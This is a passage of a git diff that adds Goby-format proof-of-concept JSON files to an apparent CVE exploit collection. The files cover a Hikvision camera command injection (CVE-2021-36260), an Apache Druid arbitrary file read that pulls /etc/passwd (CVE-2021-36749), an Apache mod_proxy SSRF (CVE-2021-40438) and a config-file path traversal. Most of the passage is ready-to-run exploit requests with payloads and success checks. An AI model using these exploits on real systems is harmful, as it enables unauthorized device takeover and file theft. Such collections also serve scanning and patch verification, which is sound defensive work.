+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/../conf/config.properties",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "server.ssl",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "{{{Filename}}}",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-01-21 20:51:57",
+ "GobyVersion": "1.8.230"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-3019/poc/xray/CVE-2021-3019.yaml b/2021/CVE-2021-3019/poc/xray/CVE-2021-3019.yml
similarity index 100%
rename from 2021/CVE-2021-3019/poc/xray/CVE-2021-3019.yaml
rename to 2021/CVE-2021-3019/poc/xray/CVE-2021-3019.yml
diff --git a/2021/CVE-2021-3129/poc/xray/CVE-2021-3129.yaml b/2021/CVE-2021-3129/poc/xray/CVE-2021-3129.yml
similarity index 100%
rename from 2021/CVE-2021-3129/poc/xray/CVE-2021-3129.yaml
rename to 2021/CVE-2021-3129/poc/xray/CVE-2021-3129.yml
diff --git a/2021/CVE-2021-31602/poc/xray/CVE-2021-31602.yaml b/2021/CVE-2021-31602/poc/xray/CVE-2021-31602.yml
similarity index 100%
rename from 2021/CVE-2021-31602/poc/xray/CVE-2021-31602.yaml
rename to 2021/CVE-2021-31602/poc/xray/CVE-2021-31602.yml
diff --git a/2021/CVE-2021-3223/poc/xray/CVE-2021-3223.yaml b/2021/CVE-2021-3223/poc/xray/CVE-2021-3223.yml
similarity index 100%
rename from 2021/CVE-2021-3223/poc/xray/CVE-2021-3223.yaml
rename to 2021/CVE-2021-3223/poc/xray/CVE-2021-3223.yml
diff --git a/2021/CVE-2021-33044/poc/xray/CVE-2021-33044.yaml b/2021/CVE-2021-33044/poc/xray/CVE-2021-33044.yml
similarity index 100%
rename from 2021/CVE-2021-33044/poc/xray/CVE-2021-33044.yaml
rename to 2021/CVE-2021-33044/poc/xray/CVE-2021-33044.yml
diff --git a/2021/CVE-2021-36260/poc/goby/CVE-2021-36260.json b/2021/CVE-2021-36260/poc/goby/CVE-2021-36260.json
new file mode 100644
index 000000000..d52468478
--- /dev/null
+++ b/2021/CVE-2021-36260/poc/goby/CVE-2021-36260.json
@@ -0,0 +1,112 @@
+{
+ "Name": "Hikvision RCE CVE-2021-36260",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "app=\"Hikvision-Cameras-and-Surveillance\"",
+ "Description": "攻击者利用该漏洞可以用无限制的root shell来完全控制设备,即使设备的所有者受限于有限的受保护shell(psh)。除了入侵IP摄像头外,还可以访问和攻击内部网络。\n该漏洞的利用并不需要用户交互,攻击者只需要访问http或HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。",
+ "Product": "hikvision",
+ "Homepage": "https://www.hikvision.com/cn/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html"
+ ],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastheader|regex|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "PUT",
+ "uri": "/SDK/webLanguage",
+ "follow_redirect": false,
+ "header": {
+ "X-Requested-With": "XMLHttpRequest",
+ "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "\n$(ls -l >webLib/c)",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ },
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/c",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-17 13:28:08",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-36260/poc/xray/CVE-2021-36260.yaml b/2021/CVE-2021-36260/poc/xray/CVE-2021-36260.yml
similarity index 100%
rename from 2021/CVE-2021-36260/poc/xray/CVE-2021-36260.yaml
rename to 2021/CVE-2021-36260/poc/xray/CVE-2021-36260.yml
diff --git a/2021/CVE-2021-3654/poc/xray/CVE-2021-3654.yaml b/2021/CVE-2021-3654/poc/xray/CVE-2021-3654.yml
similarity index 100%
rename from 2021/CVE-2021-3654/poc/xray/CVE-2021-3654.yaml
rename to 2021/CVE-2021-3654/poc/xray/CVE-2021-3654.yml
diff --git a/2021/CVE-2021-36749/poc/goby/CVE-2021-36749.json b/2021/CVE-2021-36749/poc/goby/CVE-2021-36749.json
new file mode 100644
index 000000000..2ba9c656d
--- /dev/null
+++ b/2021/CVE-2021-36749/poc/goby/CVE-2021-36749.json
@@ -0,0 +1,104 @@
+{
+ "Name": "Apache Druid Abritrary File Read CVE-2021-36749",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "title=\"Apache Druid\"",
+ "Description": "In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.",
+ "Product": "Druid",
+ "Homepage": "https://druid.apache.org/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://mp.weixin.qq.com/s/1iGsy2KpiijihtJ3M2Tdzw"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "Path",
+ "Type": "input",
+ "Value": "/etc/passwd"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/druid/indexer/v1/sampler?for=connect",
+ "follow_redirect": false,
+ "header": {
+ "Accept": "application/json, text/plain, */*",
+ "Content-Type": "application/json;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root:x:",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/druid/indexer/v1/sampler?for=connect",
+ "follow_redirect": false,
+ "header": {
+ "Accept": "application/json, text/plain, */*",
+ "Content-Type": "application/json;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\"file://{{{Path}}}\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\",\"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-23 17:14:35",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-36749/poc/xray/CVE-2021-36749.yaml b/2021/CVE-2021-36749/poc/xray/CVE-2021-36749.yml
similarity index 100%
rename from 2021/CVE-2021-36749/poc/xray/CVE-2021-36749.yaml
rename to 2021/CVE-2021-36749/poc/xray/CVE-2021-36749.yml
diff --git a/2021/CVE-2021-40438/poc/goby/CVE-2021-40438.json b/2021/CVE-2021-40438/poc/goby/CVE-2021-40438.json
new file mode 100644
index 000000000..27e8d1ad2
--- /dev/null
+++ b/2021/CVE-2021-40438/poc/goby/CVE-2021-40438.json
@@ -0,0 +1,98 @@
+{
+ "Name": "Apache HTTP Server SSRF CVE-2021-40438",
+ "Level": "3",
+ "Tags": [
+ "ssrf"
+ ],
+ "GobyQuery": "(product=\"Apache-Web-Server\"||server=\"Apache\")",
+ "Description": "A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network",
+ "Product": "Apache-Web-Server",
+ "Homepage": "https://gobies.org/",
+ "Author": "aetkrad",
+ "Impact": "It allows remote attackers to access the content of internal network resources.
",
+ "Recommendation": "",
+ "References": [
+ "https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-40438#apache-http-server-2448-mod_proxy-ssrf-cve-2021-40438"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "cmd",
+ "Type": "input",
+ "Value": "http://baidu.com/api/v1/targets"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "302",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$head",
+ "operation": "contains",
+ "value": "http://www.baidu.com/search/error.html",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastheader|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|{{{cmd}}}",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-04 20:40:03",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
diff --git a/2021/CVE-2021-40438/poc/xray/CVE-2021-40438.yaml b/2021/CVE-2021-40438/poc/xray/CVE-2021-40438.yml
similarity index 100%
rename from 2021/CVE-2021-40438/poc/xray/CVE-2021-40438.yaml
rename to 2021/CVE-2021-40438/poc/xray/CVE-2021-40438.yml
diff --git a/2021/CVE-2021-40539/poc/goby/CVE-2021-40539.json b/2021/CVE-2021-40539/poc/goby/CVE-2021-40539.json
new file mode 100644
index 000000000..01d8fdfe5
